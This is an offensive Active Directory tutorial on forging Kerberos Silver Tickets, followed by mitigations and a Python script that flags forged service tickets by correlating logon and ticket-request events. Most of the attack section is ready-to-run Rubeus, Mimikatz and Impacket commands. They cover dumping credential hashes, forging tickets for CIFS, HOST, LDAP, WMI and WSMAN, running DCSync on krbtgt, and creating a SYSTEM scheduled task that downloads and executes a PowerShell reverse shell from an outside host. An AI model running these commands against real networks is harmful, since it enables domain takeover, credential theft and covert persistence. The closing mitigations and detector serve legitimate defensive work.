Silver Tickets

While most of the attention goes towards Golden Tickets as a means of persistence, Silver Tickets are also an effective method, and arguably quieter as well.

The difference is scope: a Golden Ticket grants access across the whole domain, while a Silver Ticket limits your access to the single service you wish to target.

Silver Tickets can be forged to gain access to a service in an Active Directory domain if you are able to obtain the password hash of the service account running that service. That is because Ticket Granting Service (TGS) tickets are signed and encrypted with the hash of the account running the service. Therefore, having the hash of this account enables you to forge TGS tickets for it.

It should be noted that Silver Tickets can be forged not only from the hashes of service accounts but from computer account hashes as well, since computer accounts run many services on the machine (like CIFS) as the local system. The computer hash does not have to be a Domain Controller hash: a computer that has access to the Domain Controller via group membership works as well.

Just like Golden Tickets, the forged ticket can be created on behalf of any user, including fake accounts.

If the Privilege Attribute Certificate (PAC) inside the TGS ticket is not validated, it can be manipulated to elevate the account's privileges to those of an Admin.

A common method to obtain a service account hash is through kerberoasting.

I have already explained the Kerberos authentication mechanism here.

There are three reasons why this persistence technique is so effective:

  1. The hash of a service account is easier to obtain than that of the krbtgt account.

  2. It bypasses steps 1-4 of the Kerberos authentication process altogether, meaning that forging a ticket requires no communication whatsoever with the Domain Controller. Log events will only be seen on the machines running the services you want to gain access to.

  3. While computer account passwords are typically changed every 30 days, this can be disabled [1]. Regardless, 30 days to persist with this hash is still a reasonable amount of time.

With Rubeus.exe

# First request a TGT
.\Rubeus.exe asktgt /user:<user> /rc4:<hash>
# Then request a TGS
.\Rubeus.exe asktgs /ticket:<b64_ticket> /service:<service>/<domain>[,<service2>/<domain>] /ptt

With Mimikatz

Getting the Service Account or Computer Hashes

Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

The General Command to Issue the Ticket

  • The '/ptt' option injects the ticket into memory

  • You can also use the '/ticket' option instead to save the ticket to a file

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<target-domain> /service:<service> /rc4:<service-acct-or-computer-hash> /user:Administrator /ptt"'

Accessing Shares on the DC Using the DC Computer Hash

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:cifs /rc4:<DC$-hash> /user:Administrator /ptt"'

# Then check your access
ls \\dc.domain\C$

Creating a Silver Ticket That Allows You to Build and Run Scheduled Tasks as a Method of Persistence

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:HOST /rc4:<computer-hash> /user:Administrator /ptt"'

  • Then build and run a scheduled task

# setup the scheduled task
schtasks /create /S <dc_domain> /SC Weekly /RU "NT Authority\SYSTEM" /TN "<name>" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://<ip>/Invoke-PowerShellTcp.ps1'')'"

# then run it and wait for your reverse shell
schtasks /Run /S <dc_domain> /TN "<name>"

# if you want to end or delete the task:
schtasks /End /S <dc_domain> /TN "<name>"
schtasks /delete /S <dc_domain> /TN "<name>"

Using Silver Tickets to Create a New Powershell Remoting Session

  • This attack requires two tickets, one for the HTTP SPN and the other for the WSMAN SPN

# Create a ticket for the HTTP Service
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:HTTP /rc4:<computer-hash> /user:Administrator /ptt"'

# Now for the wsman SPN
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:WSMAN /rc4:<computer-hash> /user:Administrator /ptt"'

# check if the tickets are created
klist

# Then enter a new session
$sess = New-PSSession -ComputerName <computer>
Enter-PSSession -Session $sess

Using Silver Tickets to Gain Access to LDAP Services

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:LDAP /rc4:<computer-hash> /user:Administrator /ptt"'

  • Then you can run DCSync to get the krbtgt creds

Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt /dc:<dc.domain> /domain:<domain>"'

Using Silver Tickets to Gain Access to Services Running on HTTP

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:HTTP /rc4:<computer-hash> /user:Administrator /ptt"'

# then check your access
Invoke-WebRequest -UseBasicParsing -UseDefaultCredentials http://dc.domain

Using Silver Tickets to Access WMI

  • Requires tickets for both HOST and RPCSS

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:HOST /rc4:<computer-hash> /user:Administrator /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:RPCSS /rc4:<computer-hash> /user:Administrator /ptt"'

# check if the tickets are injected
klist

# then check your access: if the command returns output, the tickets work
Get-WmiObject Win32_Processor -ComputerName <dc.domain>

# then run commands
$command = "ping <ip>"
Invoke-WmiMethod win32_process -ComputerName <dc.domain> -Name create -ArgumentList "$command"

With Impacket

Ticketer.py

# Step 1
python3 ticketer.py -nthash <hash> -domain-sid <domain-SID> -domain <domain> -spn <SPN>/<dc_domain> -dc-ip <dc-ip> Administrator

# Step 2
export KRB5CCNAME=Administrator.ccache

# Step 3 (psexec.py also works if CIFS is the SPN)
python3 wmiexec.py Administrator@<dc_domain> -k -no-pass

GetST.py

# Step 1
python3 getST.py -spn <SPN>/<domain> -dc-ip <ip> -impersonate Administrator <user> [-hashes <lm:nt>]

# Step 2
export KRB5CCNAME=Administrator.ccache

# Step 3 -> access the service

Mitigations

  • Have good control over the service accounts. Limit their access as best as you can in order to minimize the chances of the accounts being compromised.

  • Monitor the logon events on the local machines and use ATA (Microsoft Advanced Threat Analytics) to try and correlate TGS requests with TGT requests to the DC.

  • Make sure no computer accounts are members of admin groups and check regularly whether there are any computer accounts in admin groups.

  • Make sure that computer account passwords are changed regularly.
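
The second mitigation above, together with reason 2 in the list near the top of the page (a forged ticket never touches the DC, so the only trace is on the target host), can be turned into a concrete check. The following is an added example, not code from the original page or from any of the tools it mentions: it correlates Kerberos network logons (event 4624, logon type 3) collected from member servers with service ticket requests (event 4769) collected from the Domain Controllers, and flags any logon for which no DC ever issued a ticket for that user to that host within the ticket lifetime. The log format, host names, user names and IP addresses are constructed for the example; a real deployment would feed it the same fields extracted from the Security event log of every DC and monitored host.

```python
"""
Flag Kerberos service-ticket use that no Domain Controller ever issued.

A forged Silver Ticket is presented straight to the target service, so the
target host logs a 4624 (logon type 3, package Kerberos) while no DC logs the
4769 "service ticket was requested" event that normally precedes it.
"""
from datetime import datetime, timedelta

# Constructed sample records (hypothetical hosts and users), rendered as
# simplified key=value lines holding the relevant fields of each event.
DC_LOG = """\
ts=2024-05-01T09:00:00 id=4769 user=alice service=FS01$ client=10.0.0.21
ts=2024-05-01T09:04:50 id=4769 user=bob service=FS01$ client=10.0.0.22
ts=2024-05-01T08:00:00 id=4769 user=carol service=WEB01$ client=10.0.0.23
"""

MEMBER_LOG = """\
ts=2024-05-01T09:00:07 id=4624 host=FS01 user=alice type=3 pkg=Kerberos
ts=2024-05-01T09:05:02 id=4624 host=FS01 user=bob type=3 pkg=Kerberos
ts=2024-05-01T09:30:00 id=4624 host=FS01 user=Administrator type=3 pkg=Kerberos
ts=2024-05-01T09:31:00 id=4624 host=FS01 user=svc-backup type=3 pkg=NTLM
ts=2024-05-01T10:00:00 id=4624 host=WEB01 user=carol type=3 pkg=Kerberos
"""

# Default maximum service ticket lifetime in an AD domain is 10 hours, so a
# legitimate logon must be preceded by a 4769 no more than that long ago.
TICKET_LIFETIME = timedelta(hours=10)
# Tolerate a little clock skew between the DC and the member server.
CLOCK_SKEW = timedelta(minutes=5)


def parse_events(text):
    """Parse key=value lines into dicts; 'ts' becomes a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(token.split("=", 1) for token in line.split())
        fields["ts"] = datetime.fromisoformat(fields["ts"])
        events.append(fields)
    return events


def find_unrequested_kerberos_logons(dc_text, member_text,
                                     lifetime=TICKET_LIFETIME, skew=CLOCK_SKEW):
    """Return member-host Kerberos network logons with no matching DC 4769.

    A 4769 matches a logon when the requesting user is the same, the
    'service' field is the target host's computer account (HOST$) and the
    request happened within one ticket lifetime before the logon.
    """
    tgs_requests = [e for e in parse_events(dc_text) if e["id"] == "4769"]
    logons = [e for e in parse_events(member_text)
              if e["id"] == "4624" and e["type"] == "3"
              and e["pkg"] == "Kerberos"]
    flagged = []
    for logon in logons:
        service_account = logon["host"].lower() + "$"
        issued = any(
            req["user"].lower() == logon["user"].lower()
            and req["service"].lower() == service_account
            and -skew <= logon["ts"] - req["ts"] <= lifetime
            for req in tgs_requests
        )
        if not issued:
            flagged.append(logon)
    return flagged


def summarize(flagged):
    """One human-readable line per flagged logon, for an alert or report."""
    return [f"{e['ts'].isoformat()} {e['host']} user={e['user']}" for e in flagged]


if __name__ == "__main__":
    for line in summarize(find_unrequested_kerberos_logons(DC_LOG, MEMBER_LOG)):
        print("possible forged service ticket:", line)
```

On the sample data only the Administrator logon to FS01 is reported: alice, bob and carol each have a 4769 from a DC naming their target host's computer account, and the NTLM logon is out of scope for this check. In practice the DC side must include 4769 events from every DC in the domain (a ticket can be issued by any of them), and the user and host fields should be normalised the same way on both sides before comparison, as the example does with lower-casing.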

References

[1] https://adsecurity.org/?p=2753
